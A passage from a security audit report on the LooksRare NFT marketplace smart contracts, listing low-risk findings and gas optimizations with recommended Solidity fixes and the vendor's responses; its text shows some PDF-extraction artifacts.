makerAsk.strategyId, fees[1], minTotalFeeAmount); // Net fee amount for seller fees[2] = price - fees[1] - fees[0]; } will be replaced by fees[2] = price; if (fees[1] == 0) { // If creator fee is null, protocol fee is set as the minimum total fee amount fees[0] = minTotalFeeAmount; } else { // If there is a creator fee information, the protocol fee amount can be calculated fees[0] = _calculateProtocolFeeAmount(price, makerAsk.strategyId, fees[1], minTotalFeeAmount); } if (takerBid.maxPrice < (fees[0] + fees[1] + fees[2])) { revert BidTooLow(); } pmakerAsk min (cid:20) f2 (cid:20) f0 + f1 + f2 (cid:20) ptakerBid max future taker bid strategies would need to guarantee the price they pick is always not less than makerAsk.minPrice ( pmakerAsk (cid:20) f2 ) and by the above change the protocol validates the returned price range including the fees against min 9 the takerBid.maxPrice ( f0 + f1 + f2 (cid:20) ptakerBid max ). Changes required for taker ask strategies: • Common changes for all strategies: the takerAsk.minPrice needs to be compared to the fees[2] which is the amount the msg.sender or takerAsk.recipient would receive. • InheritedStrategy: iszero(eq(price, counterpartyPrice))) needs to be taken out of this shared logic between taker bid and ask executions. The strategy chooses makerBid.maxPrice as the strategies price which is correct since we also need to make sure the price returned by the strategy which is what the maker would spend is at most makerBid.maxPrice. • StrategyItemIdsRange: if (makerBid.maxPrice != takerAsk.minPrice) needs to be removed as the common required change would cover this. Also, this strategy picks the price in a way that it is not greater than makerBid.maxPrice. • StrategyCollectionOffer: price != takerAsk.minPrice (2) needs to be removed as the common re- quired change would cover this. Also, this strategy picks the price in a way that it is not greater than makerBid.maxPrice. • StrategyFloorFromChainlink.execute...DiscountCollectionOfferStrategyWithTakerAsk: if (takerAsk.minPrice > price) (2) needs to be removed as the common required change would cover this. Also, this strategy picks the price in a way that it is not greater than makerBid.maxPrice. In a nutshell, remove the above-mentioned checks for takerAsk.minPrice from individual strategies and instead apply a similar check at the protocol level that also excludes deducted fees: We can add a check to the following if (fees[1] == 0) { // If creator fee is null, protocol fee is set as the minimum total fee amount fees[0] = minTotalFeeAmount; // Net fee for seller fees[2] = price - fees[0]; } else { // If there is a creator fee information, the protocol fee amount can be calculated fees[0] = _calculateProtocolFeeAmount(price, makerBid.strategyId, fees[1], minTotalFeeAmount); // Net fee for seller fees[2] = price - fees[1] - fees[0]; } The added new check if (takerAsk.minPrice > fees[2]) { revert AskTooHigh(); } ptakerAsk min (cid:20) f2 (cid:0) f0 (cid:0) f1 (cid:20) f2 (cid:20) pmakerBid max future taker bid strategies would need to guarantee the price they pick is always not greater makerBid.maxPrice ( f2 (cid:20) pmakerBid max excluding the fees against the takerAsk.minPrice ( ptakerAsk than ) and by the above change the protocol validates the returned price range (cid:20) f2 (cid:0) f0 (cid:0) f1 ). min The above changes would protect the invariants set by the maker and taker when slippage is introduced by: • Variable creator fees. • owner front-running (potentially accidentally) a transaction to change the fee percentages before an order gets executed. Related issue: "Seller might get a lower fee than expected due to front-running" LooksRare: Acknowledged. Spearbit: Acknowledged. 10 +5.3.2 StrategyItemIdsRange does not invalidate makerBid.amounts[0] == 0 Severity: Low Risk Context: • StrategyItemIdsRange.sol#L44 Description: StrategyItemIdsRange does not check whether makerBid.amounts[0] is zero or not. If it was 0, the taker can provide empty itemIds and amounts which will cause the for loop to be skipped. The check below will also be successful since both amounts are 0: if (totalOfferedAmount != desiredAmount) { revert OrderInvalid(); } Depending on the used implementation of a transfer manager for the asset type used in this order, we might end up with the taker taking funds from the maker without providing any NFT tokens. The current implementation of TransferManager does check whether the provided itemIds have length 0 and it would revert in that case. One difference between this strategy and others are that all strategies including this one do check to revert if an amount for a specific itemId is 0 (and some of them have loops but the length of those loops depends on the parameters from the maker which enforce the loop to run at least once), but for this strategy if no itemIds are provided by the taker, the loop is skipped and one does not check whether the aggregated amount is 0 or not. Recommendation: executeStrategyWithTakerAsk and isMakerBidValid, both should check whether maker- Bid.amounts[0] == 0 and revert (return invalid). LooksRare: Fixed in PR 367. Spearbit: Verified. +5.3.3 TransferManager's owner can block token transfers for LooksRareProtocol Severity: Low Risk Context: • TransferManager.sol#L241 • TransferSelectorNFT.sol#L28-L32 Description: In general, a deployed TransferManager ( T ) and a deployed LooksRareProtocol ( L ) might have two different owners ( OT , OL ). Assume TransferManager is used for asset types 0 and 1 (ERC721, ERC1155) in LooksRareProtocol and Trans- ferManager has marked the LooksRareProtocol as an allowed operator. At any point, OT can call removeOpera- tor to block L from calling T . If that happens, OL would need to add new (virtual) asset types (not 0 or 1) and the corresponding transfer managers for them. Makers would need to resign their orders with new asset types. Moreover, if LooksRare for the following issue "The Protocol owner can drain users' currency tokens" applies their solution through PR 308 which removes the ability of OL to add new asset types, then the whole protocol would need to be redeployed, since all order executions would revert. Recommendation: Enforce OL = OT . This can be done by modifying the LooksRareProtocol's constructor to deploy TransferManager and assign OL as its owner and make sure OL can only update OT at any point in time. Another solution to this problem could be to make sure OL has more power than OT . For example, OL should be able to set/update OT at any point (one can check that before adding T to L ). LooksRare: Acknowledged but the purpose of having a transfer manager contract separate from the protocol contract is to allow future versions of marketplace protocols (or other systems) to reuse existing user approvals. 11 It is possible the protocol itself "gets discontinued" in the future with ownership being renounced while the transfer manager system removes active. Spearbit: Acknowledged. +5.3.4 transferItemsERC721 and transferBatchItemsAcrossCollections in TransferManager do not check whether an amount == 1 for an ERC721 token Severity: Low Risk Context: • TransferManager.sol#L47 • TransferManager.sol#L112 Description: transferItemsERC721 and transferBatchItemsAcrossCollections in TransferManager do not check whether an amount == 1 for an ERC721 token. If an operator (approved by a user) sends a 0 amount for an itemId in the context of transferring ERC721 token, TransferManager would perform those transfers, even though the logic in the operator might have meant to avoid those transfers. Recommendation: In transferItemsERC721 and transferBatchItemsAcrossCollections would be best to in- troduce checks for ERC721 token amounts to make sure they are always 1 (if not skip or revert). LooksRare: Amount checks have been moved from execution strategies to the transfer manager in PR 386. Spearbit: Verified. +5.3.5 The maker cannot enforce the number of times a specific order can be fulfilled for custom strategies Severity: Low Risk Context: • ExecutionManager.sol#L221 • ExecutionManager.sol#L135 • LooksRareProtocol.sol#L549-L556 Description: When a maker signs an order with a specific strategy it leaves it up to the strategy to decide how many times this specific order can be fulfilled. The strategy's logic on how to decide on the returned isNonceIn- validated value, can be a complex logic in general that might be prone to errors (or have backdoors). The maker should be able to directly enforce at least an upper bound for the maximum number of fulfills for an order to avoid unexpected expenditure. Recommendation: It would be best to introduce a new field maxNumberOfFulfillments (or a similar name) for the structs MakerBid and MakerAsk which the maker can sign. The LooksRare protocol would need to define a new storage parameter that keeps track of the number of fulfillments based on the orderHash: mapping(bytes32 => uint256) private orderFulfilled; and make sure the number of fulfillments (orderFulfilled[orderHash]) does not surpass maxNumberOfFulfill- ments. LooksRare: Acknowledged but won't implement. Spearbit: Acknowledged. 12 +5.3.6 A strategy can potentially reduce the value of a token before it gets transferred to a maker when a taker calls executeTakerAsk Severity: Low Risk Context: • ExecutionManager.sol#L124 • ExecutionManager.sol#L210 Description: When executeTakerAsk is called by a taker a (signed by maker) strategy will be called: (bool status, bytes memory data) = strategyInfo[makerBid.strategyId].implementation.call( abi.encodeWithSelector(strategyInfo[makerBid.strategyId].selector, takerAsk, makerBid) ); Note that this is a stateful call. This call is performed before the NFT token is transferred to the maker (signer). Even though the strategy is fixed by the maker (since the stratgeyId has been signed), the strategy's implementation might involve a complex logic that might allow (if the strategy colludes with the taker somehow) a derivative token (that is owned by / linked to the to-be-transferred token) to be reattached to another token (think of accessories for an NFT character token in a game). And so the value of the to-be-transferred token would be reduced in that sense. A maker would not be able to check for this linked derivative token ownership during the transaction since there is no post-transfer hook for the maker (except in one special case when the token involved is ERC1155 and the maker is a custom contract). Also, note that all the implemented strategies would not alter the state when they are called (their endpoints have a pure or a view visibility). There is an exception to this in the StrategyTestMultiFillCollectionOrder test contract. Recommendation: It would be best to only allow staticcalls when the protocol makes a call (1, 2) into a strategy to avoid the issues above. This recommendation also does not break the flow for any of the currently implemented strategies. (bool status, bytes memory data) = strategyInfo[makerXxx.strategyId].implementation.staticcall( // <--- abi.encodeWithSelector(strategyInfo[makerXxxstrategyId].selector, takerYyy, makerXxx) ); LooksRare: There might be future strategies that change state in the strategy contract, hence we decided to keep it as call instead of staticcall. Acknowledged as a business risk. Spearbit: Acknowledged. +5.3.7 An added transfer manager cannot get deactivated from the protocol Severity: Low Risk Context: • TransferSelectorNFT.sol Description: Once a transfer manager for an asset type gets added to the protocol either through the constructor or through addTransferManagerForAssetType, if at some point there is a malicious behavior involved with the transfer manager, there is no mechanism for the protocol's owner to deactivate the transfer manager (similar to how strategies can be deactivated). If TransferManager is used for an asset type, on the TransferManager side the owner can break the link between the operator (the LooksRare protocol potentially) and the TransferManager but not the other way around. Recommendation: We can add an update functionality where only the activation status of a transfer manager can get updated (and not the implementation or the selector) by the protocol owner. If an update mechanism will not be added, the above case should be documented/commented for the users/makers so that in case of a malicious activity by a transfer manager for an asset type, they would stop signing orders with 13 that asset type and also would cancel the already signed orders. And also takers would need to refrain from executing orders with that particular asset type. If the current and potential transfer managers would have the same owners as the protocol, and if that owner can break the link between these two contracts from at least one side, implementing a second pass-through filter is not necessary. LooksRare: This issue is not relevant anymore following the changes implemented in PR 308. Spearbit: Verified. +5.3.8 Temporary DoS is possible in case orders are using tokens with blacklists Severity: Low Risk Context: LooksRareProtocol.sol#L470 Description: In the process of settling orders, _transferFungibleTokens is being called at max 4 times. In case one of these calls fails the entire transaction fails. It can only fail when an ERC20 token is used for the trade but since contracts are whitelisted in the system and probably vetted by the team, it's safe to say it's less probable that the receiver will have the ability to revert the entire transaction, although it is possible for contracts that implement a transferAndCall pattern. However, there's still the issue of transactions being reverted due to blacklistings (which have become more popular in the last year). In order to better assess the risk let's elaborate more on the 4 potential recipients of a transaction: 1. affiliate - The risk can be easily mitigated by proper handling at the front-end level. If the transaction fails due to the affiliate's address, the taker can specify address(0) as the affiliate. 2. recipient - If the transaction fails due to the recipient's address, it can only impact the taker in a gas-griefing way. 3. protocol - If the transaction fails due to the protocol's address, its address might be updated by the contract owner in the worst case. 4. creator - If the transaction fails due to the creator's address it can not be changed directly, but in the worst case creatorFeeManager can be changed. Recommendation: In conclusion, this issue can not brick the system entirely, and specific orders can not be forever censored this way. However, it may still cause a temporary DoS for certain orders, that's why it is recom- mended to use an off-chain monitoring service to monitor blacklisted addresses that are used by the protocol and to make sure that it is supported at the front-end level as well if needed. Another alternative would be to implement a "pull pattern" where the fee beneficiaries (affiliate, creator, protocol) have to withdraw their allocated fees from the contract, thus decoupling a potential failure in the transfer action from the overall item transaction. There is a trade-off between security and user experience and it's up to the project team to make this decision. Either way, it is recommended to have a proper internal vetting process for tokens before white-listing. LooksRare: Acknowledged. Spearbit: Acknowledged. 14 +5.3.9 viewCreatorFeeInfo's reversion depends on order of successful calls to collection.royaltyInfo Severity: Low Risk Context: • CreatorFeeManagerWithRoyalties.sol#L56-L61 • CreatorFeeManagerWithRebates.sol#L51-L54 Description: The outcome of the call to viewCreatorFeeInfo for both CreatorFeeManagerWithRebates and Cre- atorFeeManagerWithRoyalties is dependent on the order of itemIds. Assume, we have 2 itemIds with the following properties: • itemId x where the call to collection.royaltyInfo(x, price) is successful (status == 1) and returns (a, ...) where a 6= 0. • itemId y where the call to collection.royaltyInfo(y, price) fails (status == 0) Then if itemIds provided to viewCreatorFeeInfo is: • [x, y], the call to viewCreatorFeeInfo returns successfully as the outcome for y will be ignored/skipped. • [y, x], the call to viewCreatorFeeInfo reverts with BundleEIP2981NotAllowed(collection), since the first item will be skipped and so the initial value for creator will not be set and remains address(0), but when we process the loop for x, we end up comparing a with address(0) which causes the revert. Recommendation: Either revert the calls to viewCreatorFeeInfo when a call to collection.royaltyInfo fails, or set the creator (creatorFee) on the first successful call to collection.royaltyInfo (which might not be the first round of the loop when i = 0) and ignore all failed calls. LooksRare: Fixed in PR 346. Spearbit: Verified. +5.3.10 CreatorFeeManagerWithRebates.viewCreatorFeeInfo reversion is dependent on the order of itemIds Severity: Low Risk Context: • CreatorFeeManagerWithRebates.sol#L57-L64 Description: Assume there is an itemId x where collection.royaltyInfo(x, price) returns (0, _) and an- other itemId y where collection.royaltyInfo(y, price) returns (a, _) where a 6= 0. the itemIds array provided to CreatorFeeManagerWithRebates.viewCreatorFeeInfo is [x, y, the call would revert with the return parameters would be (address(0), 0) and [y, x, ...], Then if ...], BundleEIP2981NotAllowed(collection). Recommendation: The outcome of the call to CreatorFeeManagerWithRebates.viewCreatorFeeInfo should not be dependent on the order of itemIds. We should loop over all itemIds and make sure all the creators match before returning. LooksRare: Fixed in PR 324. Spearbit: Verified. 15 +5.3.11 Affiliates can trick the protocol to receive fees even when not needed Severity: Low Risk Context: LooksRareProtocol.sol#L440 Description: Currently, takers specify the address of an affiliate, which will get a portion of the protocol fee in case it has a non-zero value in the affiliateRates mapping, and the affiliate program is active. Whitelisted affiliates can trick the system by either colluding with potential takers that will set their affiliate address and then later split the revenue between them or by acting as both the taker and the affiliate (by using different addresses that belong to the same party) when trading their own items. This, in turn, will cause a decrease in fees collected by the protocol address. LooksRare: Acknowledged. Accepted as a business risk inherent to the feature. Spearbit: Acknowledged. +5.3.12 Seller might get a lower fee than expected due to front-running Severity: Low Risk Context: ExecutionManager.sol#L95 ExecutionManager.sol#L183 Description: This protocol seems to have a fee structure where both the protocol and the original creator of the item are charging fees, and these fees are being subtracted from the seller's fee. This means that the seller, whether they are a maker or a taker, may receive a lower price than they expected due to sudden changes in creator or protocol fee rates. Recommendation: The impact of the described issue is limited since a potential loss is already capped in the current version of the code, However, it is still recommended to add a variable that represents the maximum fee that the seller is willing to pay to the Order struct, and to validate that the actual fee does not exceed this value. This will provide an additional layer of protection against any potential losses. LooksRare: Acknowledged. This is a known accepted issue with numbers up to 5% for protocol fee (set at the strategy) and 10% (originally 25%) for royalty. So while the default is 2% (2% protocol fees and no royalty), it can be as high as 15% (5% protocol fees and 10% royalties). This was implemented in such a way so as to simplify the logic in the backend from preventing orders which cannot be executed due to mismatch onchain and offchain slippage. Spearbit: Acknowledged. +5.3.13 StrategyManager does not emit an event when the first strategy gets added. Severity: Low Risk Context: • StrategyManager.sol#L32-L42 Description: StrategyManager does not emit an event when the first strategy gets added which can cause issues for off-chain agents. Recommendation: To make it easier for off-chain agents' data lookup, it would be great to make sure to also emit the NewStrategy event when the first strategy is added in StrategyManager's constructor 16 constructor(address _owner) CurrencyManager(_owner) { strategyInfo[0] = Strategy({ isActive: true, standardProtocolFeeBp: 150, minTotalFeeBp: 200, maxProtocolFeeBp: 300, selector: bytes4(0), isMakerBid: false, implementation: address(0) }); emit NewStrategy( 0, 150, 200, 300, bytes4(0), false, address(0) ); } LooksRare: Fixed in PR 313. Spearbit: Verified. +5.3.14 TransferSelectorNFT does not emit events when new transfer managers are added in its construc- tor Severity: Low Risk Context: • TransferSelectorNFT.sol#L28-L32 Description: TransferSelectorNFT does not emit an event when assetTypes of 0 and 1 are added in its con- structor. Recommendation: To make it easier for off-chain agents' data lookup, it would be best to emit NewAssetType every time a new transfer manager is added. constructor(address _owner, address transferManager) ExecutionManager(_owner) { // Transfer manager with selectors for ERC721/ERC1155 managerSelectorOfAssetType[0] = ManagerSelector({transferManager: transferManager, selector: ,! 0xa7bc96d3}); managerSelectorOfAssetType[1] = ManagerSelector({transferManager: transferManager, selector: ,! 0xa0a406c6}); emit NewAssetType(0, transferManager, 0xa7bc96d3); emit NewAssetType(1, transferManager, 0xa0a406c6); } LooksRare: Not necessary anymore since adding new asset types has been removed in PR 308. Spearbit: Verified. 17 +5.3.15 Protocol fees will be sent to address(0) if protocolFeeRecipient is not set. Severity: Low Risk Context: • LooksRareProtocol.sol#L452 • ExecutionManager.sol#L43 Description: Protocol fees will be sent to address(0) if protocolFeeRecipient is not set. Recommendation: Either add a check before _transferFungibleTokens to make sure to only send fees if proto- colFeeRecipient is not address(0) or enforce protocolFeeRecipient is set in ExecutionManager's construc- tor. LooksRare: Fixed in PR 349. Spearbit: Verified. +5.3.16 The returned price by strategies are not validated Severity: Low Risk Context: • ExecutionManager.sol#L135 • ExecutionManager.sol#L221 Description: When a taker submits an order to be executed, the returned price by the maker's chosen strategy is not validated. The current strategies do have the validations implemented. But the general upper and lower bound price validation would need to be in the protocol contract itself since the price calculation in a potential strategy might be a complex matter that cannot be easily verified by a maker or a taker. Related issue: "price validation in executeStrategyWithTakerAsk, executeCollectionStrategyWithTakerAsk and ex- ecuteCollectionStrategyWithTakerAskWithProof can be relaxed" Recommendation: Compare the returned price by strategies in LooksRareProtocol to the minimum and maxi- mum price provided by the makers and takers and make sure it is within the correct range. This validation should be refactored out of strategies and delegated directly in the protocol. if (makerXXX.strategyId == 0) { ... } else { if (strategyInfo[makerXXX.strategyId].isActive) { ... } else { revert StrategyNotAvailable(makerXXX.strategyId); } } // validate returned price here // `maxPrice` and `minPrice` are defined based on whether it's a TakerAsk or TakerBid if (price > maxPrice || price < minPrice) { revert ... } The above validation indirectly also implies that minPrice <= maxPrice. LooksRare: Acknowledged but will not be adjusted. Checks are likely to exist on other parts of the app to reject some extreme prices. Spearbit: Acknowledged. 18 +5.3.17 Makers can sign (or be tricked into signing) collection of orders (using the merkle tree mechanism) that cannot be entirely canceled. Severity: Low Risk Context: • LooksRareProtocol.sol#L126 • LooksRareProtocol.sol#L151 • LooksRareProtocol.sol#L206 • LooksRareProtocol.sol#L567 Description: All user-facing order execution endpoints of the protocol check whether the order hash is included in the merkle tree data provided by the caller. If it is, the maker/signer is only required to sign the hash of the tree's root. A maker might sign (or get tricked into signing) a root that belongs to trees with a high number of leaves such that the leaves each encode an order with • Different subsetNonce and orderNonce (this would require canceling each nonce individually if the relevant endpoints are used). • askNonce or bidNonce that form a consecutive array of intergers ( 1, (cid:1) (cid:1) (cid:1) , n ) (this would require incrementing these nonces at least n times, if this method was used as a way of canceling the orders). To cancel these orders, the maker would need to call the cancelOrderNonces, cancelSubsetNonces, or incre- mentBidAskNonces. If the tree has a high number of nodes, it might be infeasible to cancel all the orders due to gas costs. The maker would be forced to remove its token approvals (if it's not a custom EIP-1271 maker/signer) and not use that address again to interact with the protocol. Recommendation: The order cancelation through the different nonce setup fails in the above context because there is no limit on the depth/height of the merkle tree. To mitigate this, it would be best to define an upper bound based on some gas analysis (cost of cancelation) on the depth of the tree and also in case different subsetNonce, orderNonce, askNonce or bidNonce are used for each order included in the tree (like the example above) to cancel all orders in one shot, we could allow incrementBidAskNonces to increment the askNonce or bidNonce by a random number that would be greater than the maximum number of orders that would be allowed for the biggest tree. LooksRare: Fixed in PR 357, PR 372, PR 422, PR 430 and PR 440. Spearbit: Verified. +5.3.18 The ItemIdsRange strategy allows for length mismatch in itemIds and amounts Severity: Low Risk Context: StrategyItemIdsRange.sol#L94 Description: There is no validation that takerAsk.itemIds.length == takerAsk.amounts.length in the ItemIdsRange strategy, despite takerAsk.itemIds and takerAsk.amounts being the return values of the executeStrategyWithTakerAsk function. If takerAsk.itemIds.length > takerAsk.amounts.length, then the transaction will revert anyways when it attempts to read an index out of bounds in the main loop. However, there is nothing causing a revert if takerAsk.itemIds.length < takerAsk.amounts.length, and any extra values in the takerAsk.amounts array will be ignored. Most likely this issue would be caught later on in any transaction, e.g. the current TransferManager implementation checks for length mismatches. However, this TransferManager is just one possible implementation that could be added to the TransferSelectorNFT contract, so this still could be an issue. Recommendation: Add an explicit check for length mismatches on the takerAsk.itemIds and takerAsk.amounts arrays: 19 if (makerBid.itemIds.length != 2 || makerBid.amounts.length != 1) { revert OrderInvalid(); } + if (takerAsk.itemIds.length != takerAsk.amounts.length) { + + } revert OrderInvalid(); LooksRare: Fixed in PR 318 and also in the Taker rewrite PR 383 Spearbit: Verified. +5.3.19 Spec mismatch - StrategyCollectionOffer allows the only single item orders where the spec states it should allow any amount Severity: Low Risk Context: StrategyCollectionOffer.sol#L46 StrategyCollectionOffer.sol#L87 executeCollectionStrategyWithTakerAsk, executeCollectionStrategyWithTakerAskWith- Description: Proof only allow the transfer of a single ERC721/ERC1155 item, although the specification states it should support any amount. Recommendation: While it might be just an oversight or an unclear requirement in the specification, make sure that the spec is aligned with the actual implementation. LooksRare: Fixed in PR 347. Spearbit: Verified. +5.3.20 Owner of strategies that inherit from BaseStrategyChainlinkMultiplePriceFeeds can add mali- cious price feeds after they have been added to LooksRareProtocol Severity: Low Risk Context: • BaseStrategyChainlinkMultiplePriceFeeds.sol#L49 Description: Owner of strategies that inherit from BaseStrategyChainlinkMultiplePriceFeeds can add mali- cious price feeds for new collections after they have been added to LooksRareProtocol. It's also important to note that these strategy owners might not neccessarily be the same owner as the LooksRareProtocol's. 1. LooksRareProtocol's OL adds strategy S. 2. Stragey's owner OS adds a malicous price feed for a new collection T . Recommendation: It would be best to enforce that owners of contracts inherited from BaseStrategyChainlink- MultiplePriceFeeds are the same as LooksRareProtocol's ( OL = OS ) or to make sure that LooksRareProto- col's owner is the only entity that can add new price feeds. Note that the protocol owner can always deactivate the strategy after the fact by toggling its isActive field. LooksRare: Acknowledged as a risk but will not adjust. Spearbit: Acknowledged. 20 +5.3.21 The price calculation in StrategyDutchAuction can be more accurate Severity: Low Risk Context: • StrategyDutchAuction.sol#L67-L71 Description: StrategyDutchAuction calculates the auction price as uint256 duration = makerAsk.endTime - makerAsk.startTime; uint256 decayPerSecond = (startPrice - makerAsk.minPrice) / duration; uint256 elapsedTime = block.timestamp - makerAsk.startTime; price = startPrice - elapsedTime * decayPerSecond; One of the shortcomings of the above calculation is that division comes before multiplication which can amplify the error due to division. Recommendation: It is recommended to perform the price calculation like the below. { } uint256 startTime = makerAsk.startTime; uint256 endTime = makerAsk.endTime; price = ( (endTime - block.timestamp) * startPrice + (block.timestamp - startTime) * makerAsk.minPrice ) / (endTime - startTime); LooksRare: Fixed in PR 309. Spearbit: Verified. +5.3.22 Incorrect isMakerBidValid logic in ItemIdsRange execution strategy Severity: Low Risk Context: StrategyItemIdsRange.sol#L115 Description: If an ItemIdsRange order has makerBid.itemIds[0] == 0, it is treated as invalid by the corre- sponding isMakerBidValid function. Since makerBid.itemIds[0] is the minItemId value, and since many NFT collections contain NFTs with id 0, this is incorrect (and does not match the logic of the ItemIdsRange executeS- trategyWithTakerAsk function). As a consequence, frontends that filter orders based on the isMakerBidValid function will ignore certain orders, even though they are valid. Recommendation: Changing the check to makerBid.itemIds[1] == 0 is one possible fix, since an order with maxItemId of 0 is certainly invalid (as minItemId can't possibly be smaller than it). However, minItemId >= maxItemId is already checked later on in the function, so it is recommended to simply remove the check altogether: -if (makerBid.itemIds.length != 2 || makerBid.amounts.length != 1 || makerBid.itemIds[0] == 0) { +if (makerBid.itemIds.length != 2 || makerBid.amounts.length != 1) { return (isValid, OrderInvalid.selector); } LooksRare: Fixed in PR 304. Spearbit: Verified. 21 5.4 Gas Optimization +5.4.1 amount = makerAsk.amounts[i] can be defined eariler in StrategyUSDDynami- cAsk.executeStrategyWithTakerBid Severity: Gas Optimization Context • StrategyUSDDynamicAsk.sol#L66-L70 Description makerAsk.amounts[i] is used in the if statement for order validation prior to being stored in the variable amount. Recommendation Define amount earlier in the executeStrategyWithTakerBid's for loop to avoid decoding this value from the calldata multiple times (this will be optimized for the valid path/orders): @@ -63,12 +63,12 @@ contract StrategyUSDDynamicAsk is BaseStrategy, BaseStrategyChainlinkPriceLatenc } - ,! + + + - - for (uint256 i; i < itemIdsLength; ) { if (makerAsk.itemIds[i] != takerBid.itemIds[i] || makerAsk.amounts[i] != takerBid.amounts[i]) { uint256 amount = makerAsk.amounts[i]; if (makerAsk.itemIds[i] != takerBid.itemIds[i] || amount != takerBid.amounts[i]) { revert OrderInvalid(); } uint256 amount = makerAsk.amounts[i]; if (amount != 1) { if (amount == 0) { revert OrderInvalid(); testCannotExecuteIfNotWETHOrETH() (gas: -231 (-0.025%)) testUSDDynamicAskBidderOverpaid() (gas: -231 (-0.082%)) testUSDDynamicAskUSDValueLessThanMinAcceptedEthValue() (gas: -231 (-0.082%)) testUSDDynamicAskUSDValueLessThanOneETH() (gas: -231 (-0.082%)) testUSDDynamicAskUSDValueGreaterThanOrEqualToMinAcceptedEthValue() (gas: -231 (-0.082%)) testTakerBidTooLow() (gas: -231 (-0.128%)) testItemIdsMismatch() (gas: 251 (0.144%)) testAmountGreaterThanOneForERC721() (gas: -231 (-0.148%)) testZeroAmount() (gas: -231 (-0.148%)) testOraclePriceNotRecentEnough() (gas: -231 (-0.149%)) testUSDDynamicAskInvalidChainlinkPrice() (gas: -462 (-0.161%)) Overall gas change: -2290 (-0.944%) LooksRare: Not relevant anymore as amount checks have been moved to the transfer manager (see PR 386). Spearbit: Verified. 22 +5.4.2 Restructure struct definitions in OrderStructs in a more optimized format Severity: Gas Optimization Context: • OrderStructs.sol Description: Maker and taker ask and bid structs include the fields itemIds and amounts. For most strategies, these two arrays are supposed to have the same length (except for StrategyItemIdsRange). Even for Strate- gyItemIdsRange one can either: • Relax the requirement that makerBid.amounts.length == 1 (be replaced by amounts and itemIds length to be equal to 2 ) by allowing an unused extra amount or • not use the makerBid.amounts and makerBid.itemIds and instead grab those 3 parameters from the addi- tionalParameters field. This might actually make more sense since in the case of StrategyItemIdsRange, the itemIds and amounts carry information that deviates from what they are intended to be used for. Recommendation: Transform the maker and taker bid and ask structs from struct XakerXxx { ... uint256[] itemIds; uint256[] amounts; bytes additionalParameters; } into: struct Item { uint256 itemId; uint256 amount; } struct XakerXxx { ... Item[] items; bytes additionalParameters; } This has a few benefits: • The 1-1 correspondence between amounts and item ids is enforced by definition and we can remove the extra checks that currently exists to enforce this (XakerXxx.amounts.length == XakerXxx.itemIds.length). • The calldata and memory encoding of XakerXxx will be more compact. Related issue: "Constraints among the number of item ids and amounts for taker or maker bids or asks are inconsistent among different strategies" LooksRare: We will not implement the Item struct and the removal of itemIds/amounts from taker structs and use additionalParameters when needed. We have added additionalParameters for StrategyItemIdsRange in PR 340. Spearbit: Verified. 23 +5.4.3 if/else block in executeMultipleTakerBids can be simplified/optimized Severity: Gas Optimization Context: • LooksRareProtocol.sol#L208-L222 Description / Recommendation: if/else block in executeMultipleTakerBids can be simplified/optimized by using the continue keyword and placing the else's body in the outer scope. // If atomic, it uses the executeTakerBid function, if not atomic, it uses a catch/revert pattern with external function ,! if (isAtomic) { // Execute the transaction and add protocol fee totalProtocolFeeAmount += _executeTakerBid(takerBid, makerAsk, msg.sender, orderHash); unchecked { ++i; } continue; } try this.restrictedExecuteTakerBid(takerBid, makerAsk, msg.sender, orderHash) returns ( uint256 protocolFeeAmount ) { totalProtocolFeeAmount += protocolFeeAmount; } catch {} unchecked { ++i; } testThreeTakerBidsERC721OneFails() (gas: -24 (-0.002%)) Overall gas change: -24 (-0.002%) LooksRare: Fixed in PR 323. Spearbit: Verified. +5.4.4 Cache currency in executeTakerAsk and executeTakerBid Severity: Gas Optimization Context: • LooksRareProtocol.sol#L112 • LooksRareProtocol.sol#L139 Description: currency is read multiple times from calldata in executeTakerAsk and executeTakerBid. Recommendation: We can cache currency to optimize these 2 functions @@ -116,8 +116,9 @@ contract LooksRareProtocol is OrderStructs.MerkleTree calldata merkleTree, address affiliate ) external nonReentrant { + - + address currency = makerBid.currency; // Verify whether the currency is whitelisted but is not ETH (address(0)) if (!isCurrencyWhitelisted[makerBid.currency] || makerBid.currency == address(0)) { if (!isCurrencyWhitelisted[currency] || currency == address(0)) { revert WrongCurrency(); 24 } @@ -129,7 +130,7 @@ contract LooksRareProtocol is uint256 totalProtocolFeeAmount = _executeTakerAsk(takerAsk, makerBid, orderHash); - + // Pay protocol fee (and affiliate fee if any) _payProtocolFeeAndAffiliateFee(makerBid.currency, signer, affiliate, totalProtocolFeeAmount); _payProtocolFeeAndAffiliateFee(currency, signer, affiliate, totalProtocolFeeAmount); } /** @@ -142,8 +143,9 @@ contract LooksRareProtocol is OrderStructs.MerkleTree calldata merkleTree, address affiliate ) external payable nonReentrant { + - + address currency = makerAsk.currency; // Verify whether the currency is whitelisted if (!isCurrencyWhitelisted[makerAsk.currency]) { if (!isCurrencyWhitelisted[currency]) { revert WrongCurrency(); } @@ -154,7 +156,7 @@ contract LooksRareProtocol is uint256 totalProtocolFeeAmount = _executeTakerBid(takerBid, makerAsk, msg.sender, orderHash); // Pay protocol fee amount (and affiliate fee if any) _payProtocolFeeAndAffiliateFee(makerAsk.currency, msg.sender, affiliate, totalProtocolFeeAmount); _payProtocolFeeAndAffiliateFee(currency, msg.sender, affiliate, totalProtocolFeeAmount); - ,! + // Return ETH if any _returnETHIfAnyWithOneWeiLeft(); testTakerBidMultipleOrdersSignedERC721WrongMerkleProof() (gas: -1 (-0.000%)) testTakerBidMultipleOrdersSignedERC721() (gas: -149 (-0.000%)) testCannotExecuteTransactionIfMakerBidWithStrategyForMakerAsk() (gas: -1 (-0.000%)) testTakerAskMultipleOrdersSignedERC721() (gas: -302 (-0.000%)) testTakerBidTooLow(uint256) (gas: -1 (-0.000%)) testItemIdsMismatch() (gas: -1 (-0.000%)) testStartPriceTooLow() (gas: -1 (-0.000%)) testItemIdsAndAmountsLengthMismatch() (gas: -1 (-0.000%)) testInactiveStrategy() (gas: -1 (-0.000%)) testZeroItemIdsLength() (gas: -1 (-0.000%)) testTakerBidReentrancy() (gas: -1 (-0.000%)) testCannotExecuteIfNotWETHOrETH() (gas: -1 (-0.000%)) testWrongAmounts() (gas: -2 (-0.000%)) testCannotTradeIfWrongCurrency() (gas: -1 (-0.000%)) testCannotTransferIfNoManagerSelectorForAssetType() (gas: -1 (-0.000%)) testCannotTradeIfDomainSeparatorHasBeenUpdated() (gas: -1 (-0.000%)) testCannotTradeIfChainIdHasChanged() (gas: -1 (-0.000%)) testCannotTradeIfWrongAmounts() (gas: -2 (-0.000%)) testFloorFromChainlinkPremiumWrongCurrency() (gas: -1 (-0.000%)) 